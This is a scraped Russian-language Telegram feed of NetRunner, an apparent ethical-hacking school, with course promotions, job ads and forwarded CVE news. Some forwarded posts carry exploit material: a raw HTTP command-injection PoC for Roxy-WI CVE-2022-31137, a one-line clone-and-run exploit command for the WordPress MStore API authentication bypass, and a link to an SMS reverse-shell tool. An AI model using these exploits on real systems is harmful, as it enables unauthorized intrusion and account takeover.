NETRUNNER GROUP
Предпродажа открыта ⛈ Расскажу немного больше о курсе: 1) Вам будет постепенно и структурировано выдаваться информация. Так, что бы вы могли ее комфортно изучить. 2) Раз в неделю наши менторы будут в формате онлайн отвечать на ваши вопросы. 3) Постепенно…
Please open Telegram to view this post
VIEW IN TELEGRAM
❤8🔥7👍3
Обновление по курсу ⛈
1) Мы полностью перенесли курс на наш сайт: https://cybernetrunner.ru
И выглядит это просто отлично😘
Если мы изначально думали вам отдать его на платформе Notions, которая если честно подлагивает и сидеть там не сильно приятно, то на нашем сайте все работает отлично)
2) Мы доделали практические задания, и их даже будет больше чем мы обещали, целых 30)
3) Ждите наш курс на еще одной обучающей платформе)
P.S. Мы расширили места и все еще можно записаться, ждём вас❤️
1) Мы полностью перенесли курс на наш сайт: https://cybernetrunner.ru
И выглядит это просто отлично
Если мы изначально думали вам отдать его на платформе Notions, которая если честно подлагивает и сидеть там не сильно приятно, то на нашем сайте все работает отлично)
2) Мы доделали практические задания, и их даже будет больше чем мы обещали, целых 30)
3) Ждите наш курс на еще одной обучающей платформе)
P.S. Мы расширили места и все еще можно записаться, ждём вас
Please open Telegram to view this post
VIEW IN TELEGRAM
👍8❤6🔥4🤔1
NETRUNNER GROUP
Скоро будет что то очень интересное ⛈
Как и обещал ⛈
Гость: Сергей TripiniFKYL Поправкин - CEO NetRunner
NetRunner, партнеры RESOLUTE ATTACK, запускают курс подготовки к PRTT
В этом интервью-подкасте предлагаем вам познакомиться поближе с основателем данной организации и узнать как он пришел к созданию собственной онлайн школы в 20 лет.
🔺 Просмотр по ссылке:
https://www.youtube.com/watch?v=ZTIR13PkV0Y
Гость: Сергей TripiniFKYL Поправкин - CEO NetRunner
NetRunner, партнеры RESOLUTE ATTACK, запускают курс подготовки к PRTT
В этом интервью-подкасте предлагаем вам познакомиться поближе с основателем данной организации и узнать как он пришел к созданию собственной онлайн школы в 20 лет.
https://www.youtube.com/watch?v=ZTIR13PkV0Y
Please open Telegram to view this post
VIEW IN TELEGRAM
YouTube
RA PODCAST #1 | TripiniFKYL
RESOLUTE ATTACK тестит новый формат: RA PODCAST
Сергей TripiniFKYL Поправкин - CEO NetRunner.
NetRunner, партнеры RESOLUTE ATTACK, запускают курс подготовки к PRTT.
В этом интервью-подкасте предлагаем вам познакомиться поближе с основателем данной организации…
Сергей TripiniFKYL Поправкин - CEO NetRunner.
NetRunner, партнеры RESOLUTE ATTACK, запускают курс подготовки к PRTT.
В этом интервью-подкасте предлагаем вам познакомиться поближе с основателем данной организации…
👍9❤🔥5😍4❤2
Forwarded from Похек (Сергей Зыбнев)
🔴KeePass 2.X Master Password Dumper
CVE-2023-32784
Кратко:
CVE-2023-32784 - это уязвимость в менеджере паролей KeePass. Эта уязвимость позволяет злоумышленнику извлечь мастер-пароль из памяти программного обеспечения, даже когда рабочее пространство заблокировано или больше не работает. Это серьезная уязвимость, так как она может позволить злоумышленнику получить доступ ко всем паролям, хранящимся в базе данных KeePass.
Разбор:
Уязвимость вызвана ошибкой в обработке паролей KeePass. Когда пользователь вводит свой мастер-пароль, KeePass сохраняет его в памяти в открытом виде. Это означает, что пароль не зашифрован и может быть легко прочитан злоумышленником, если у него есть доступ к памяти процесса KeePass. Уязвимость может быть использована злоумышленником, который имеет физический доступ к компьютеру жертвы. Атакующий может использовать инструмент для выгрузки памяти процесса KeePass, а затем искать мастер-пароль в выгрузке. Как только злоумышленник получит мастер-пароль, он сможет получить доступ ко всем паролям, хранящимся в базе данных KeePass.
Исправление:
Уязвимость была исправлена в KeePass 2.54. Пользователи, использующие более старую версию KeePass, должны обновиться до 2.54, чтобы защитить себя от этой уязвимости.
#CVE #critical
CVE-2023-32784
Кратко:
CVE-2023-32784 - это уязвимость в менеджере паролей KeePass. Эта уязвимость позволяет злоумышленнику извлечь мастер-пароль из памяти программного обеспечения, даже когда рабочее пространство заблокировано или больше не работает. Это серьезная уязвимость, так как она может позволить злоумышленнику получить доступ ко всем паролям, хранящимся в базе данных KeePass.
Разбор:
Уязвимость вызвана ошибкой в обработке паролей KeePass. Когда пользователь вводит свой мастер-пароль, KeePass сохраняет его в памяти в открытом виде. Это означает, что пароль не зашифрован и может быть легко прочитан злоумышленником, если у него есть доступ к памяти процесса KeePass. Уязвимость может быть использована злоумышленником, который имеет физический доступ к компьютеру жертвы. Атакующий может использовать инструмент для выгрузки памяти процесса KeePass, а затем искать мастер-пароль в выгрузке. Как только злоумышленник получит мастер-пароль, он сможет получить доступ ко всем паролям, хранящимся в базе данных KeePass.
Исправление:
Уязвимость была исправлена в KeePass 2.54. Пользователи, использующие более старую версию KeePass, должны обновиться до 2.54, чтобы защитить себя от этой уязвимости.
#CVE #critical
👍6❤3❤🔥2🔥2
"Что такое этот ваш Netrunner" V.2? 🤔
Информация для новоприбывших и тех кто тут потерялся.
Мы дружное сообщество этичных хакеров и тех кто по-настоящему любит ИБ
Что мы можем вам предложить?
1. Контент от нашей команды редакторов, авторские статьи, разбор кейсов, контент от партнеров)
2. Предоставляем авторские курсы для новичков, с самой востребованной информацией на рынке.
3. Партнерство, мы открыты к интересным предложениям с вашей стороны)
4. Отсутствие рекламы, в данный момент мы только лишь рекомендуем наших партнеров.
5. Возобновляем YouTube и VK, подписывайтесь!
Там будет выходить эксклюзивный контент👌
6. Так же у нас есть чат к в котором вы получите помощь и теплое общение)
По всем вопросам: @netrunner_1G
Партнерство: @TripiniFKYL
P.S. С любовью, команда NR)
Информация для новоприбывших и тех кто тут потерялся.
Мы дружное сообщество этичных хакеров и тех кто по-настоящему любит ИБ
Что мы можем вам предложить?
1. Контент от нашей команды редакторов, авторские статьи, разбор кейсов, контент от партнеров)
2. Предоставляем авторские курсы для новичков, с самой востребованной информацией на рынке.
3. Партнерство, мы открыты к интересным предложениям с вашей стороны)
4. Отсутствие рекламы, в данный момент мы только лишь рекомендуем наших партнеров.
5. Возобновляем YouTube и VK, подписывайтесь!
Там будет выходить эксклюзивный контент
6. Так же у нас есть чат к в котором вы получите помощь и теплое общение)
По всем вопросам: @netrunner_1G
Партнерство: @TripiniFKYL
P.S. С любовью, команда NR)
Please open Telegram to view this post
VIEW IN TELEGRAM
👍10❤5😍3🔥2
NetRunner ищет новые кадры к себе в команду
Мы станем вашим трамплином в профессиональную деятельность
Нам нужны:
- Начинающий Web-дизайнер креативщик (Figma)
- SMMщик для YouTube
- Начинающий маркетолог
- Монтажер
Контакты для связи: @netrunner_1G
Мы станем вашим трамплином в профессиональную деятельность
Нам нужны:
- Начинающий Web-дизайнер креативщик (Figma)
- SMMщик для YouTube
- Начинающий маркетолог
- Монтажер
Контакты для связи: @netrunner_1G
👍4🤔4❤🔥3😍2
Forwarded from Похек (Сергей Зыбнев)
🔴Roxy WI v6.1.0.0 Unauthenticated Remote Code Execution (RCE) via subprocess_execute
CVE-2022-31137
Это уязвимость удаленного выполнения кода в Roxy-WI, веб-интерфейсе для управления серверами Haproxy, Nginx, Apache и Keepalived. Уязвимость вызвана неправильной обработкой пользовательского ввода в файле
PoC:
#CVE #POC
CVE-2022-31137
Это уязвимость удаленного выполнения кода в Roxy-WI, веб-интерфейсе для управления серверами Haproxy, Nginx, Apache и Keepalived. Уязвимость вызвана неправильной обработкой пользовательского ввода в файле
/app/options.py. Злоумышленник может использовать эту уязвимость, отправив специально подготовленный HTTP-запрос, который содержит вредоносный код. Вредоносный код будет выполнен на уязвимой системе с привилегиями пользователя, запускающего Roxy-WI.PoC:
POST /app/options.py HTTP/1.1";id+##&backend_server=127.0.0.1
Host: 192.168.1.44
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 136
Origin: https://192.168.1.44
Referer: https://192.168.1.44/app/login.py
Connection: close
show_versions=1&token=&alert_consumer=1&serv=127.0.0.1&getcertalert_consumer=1&serv=127.0.0.1&ipbackend=
#CVE #POC
❤7
Forwarded from RESOLUTE ATTACK
Видеообзор мероприятия от лица нашей команды. Positive technologies, Codeby, Innostage и другие известные компании.
И многое другое в нашем видеоролике - https://youtu.be/MYfDoC2JC4M
Please open Telegram to view this post
VIEW IN TELEGRAM
YouTube
Обзор PHD 12 | Positive Hack Days 12
RESOLUTE ATTACK приехал в Московский Парк Горького на PHdays '12, чтобы вкратце показать вам как это было.
Positive Hack Days — форум по кибербезопасности, объединяющий экспертов по ИБ и этичных хакеров со всего мира.
Live студия, Stand Off, взломы банкоматов…
Positive Hack Days — форум по кибербезопасности, объединяющий экспертов по ИБ и этичных хакеров со всего мира.
Live студия, Stand Off, взломы банкоматов…
👍3🔥3❤2
По завершению второго и третьего месяца обучения на нашем курсе, будет проходить отбор из лучших учеников для практики, c нашими ведущими специалистами из отдела Pentest.
1. Доступ к реальным кейсам компании
2. Личные практические задания
3. Корпоративный контент
Please open Telegram to view this post
VIEW IN TELEGRAM
👍9❤🔥5🔥3😍2
Forwarded from Похек (Сергей Зыбнев)
MStore API <= 3.9.2 - Authentication Bypass
CVE-2023-2732
Плагин MStore API для WordPress уязвим для обхода аутентификации в версиях до 3.9.2 включительно. Это связано с недостаточной проверкой пользователя во время REST API запроса на добавление объявлений через плагин. Это позволяет злоумышленникам, не прошедшим проверку подлинности, войти в систему под именем любого существующего на сайте пользователя, например администратора, если у них есть доступ к идентификатору пользователя.
PoC:
CVE-2023-2732
Плагин MStore API для WordPress уязвим для обхода аутентификации в версиях до 3.9.2 включительно. Это связано с недостаточной проверкой пользователя во время REST API запроса на добавление объявлений через плагин. Это позволяет злоумышленникам, не прошедшим проверку подлинности, войти в систему под именем любого существующего на сайте пользователя, например администратора, если у них есть доступ к идентификатору пользователя.
PoC:
git clone https://github.com/RandomRobbieBF/CVE-2023-2732 ; pip3 install -r requirements.txt ; python3 mstore-api.py -u https://TARGET#CVE #POC
❤9👍3
Начнем с позитивного. Есть несколько хороших новостей.
1) Мы разрабатываем свою обучающую платформу. Чуть позже покажем дизайн. Он вам очень понравится.
Мы развиваемся и совершенствуемся, чтобы предоставлять вам качественные материалы и полную поддержку.
2) Для участников нашего курса ведется разработка бесплатного дополнения (по желаниям самих учеников) и не только
Теперь немного о грустном:
Вследствие некоторых обстоятельств уже бывший сотрудник попытался нас шантажировать и после неудачной попытки попытался распространить материалы курса. Меры приняты, утечку локализовали.
Оказалось, что с подобными сотрудниками информация - в опасности. Не все могут работать в области информационной безопасности 😒 Коммерческая тайна, конфиденциальность, да и просто человеческое доверие для некоторых - пустой звук.
Большое спасибо всем участникам текущего потока за поддержку и понимание нашей команды. Мы вас любим и ценим! Грустно, когда предают.
С уважением, команда NetRunner ❤️
Please open Telegram to view this post
VIEW IN TELEGRAM
👍17❤8🤔6❤🔥3
Forwarded from linkmeup
Отлично! Теперь шелл можно и через SMS пропихнуть.
Пока безопасники бьются с DLP, настраивают политики и заливают порты эпоксидкой, просто отправь SMS на номер.TCPoverSMS, my ass.
https://github.com/persistent-security/SMShell
Пока безопасники бьются с DLP, настраивают политики и заливают порты эпоксидкой, просто отправь SMS на номер.TCPoverSMS, my ass.
https://github.com/persistent-security/SMShell
🔥11👍3
Всем привет, очередные новости от NetRunner⛈
Во первых, хотелось бы рассказать о нашем оффлайн проекте.⬇️
Так как наша задача - популяризация ИБ, мы организуем кружки на базе школ для учеников. Первый запуск пройдет в городе Новосибирск.
В следующем году будем открывать в популярных городах России.
📌 Так же представляем вашему вниманию наш курс по по подготовке к PRTT на платформе наших друзей и партнеров из CyberYozh. Курс будет проходить на платформе CyberYozh Academy название курса "WEB pentest base". В курсе 24 модуля и 31 практическое задание. Курс будет по сниженной цене, без менторства.
Наверняка уже все заметили что у нас поменялся логотип канала. На днях мы выпустим пост с логотипами и проведем голосование за лучший логотип Netrunner на ваш выбор.
❗️ Просим проявить максимальную активность в голосовании
Во первых, хотелось бы рассказать о нашем оффлайн проекте.
Так как наша задача - популяризация ИБ, мы организуем кружки на базе школ для учеников. Первый запуск пройдет в городе Новосибирск.
В следующем году будем открывать в популярных городах России.
Наверняка уже все заметили что у нас поменялся логотип канала. На днях мы выпустим пост с логотипами и проведем голосование за лучший логотип Netrunner на ваш выбор.
Please open Telegram to view this post
VIEW IN TELEGRAM
❤🔥15🔥9❤3👍1
Подборка из вариантов логотипа NetRunner ⛈
Как и обещали выкатываем голосование, все зависит от вас ☺️
Как и обещали выкатываем голосование, все зависит от вас ☺️
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥9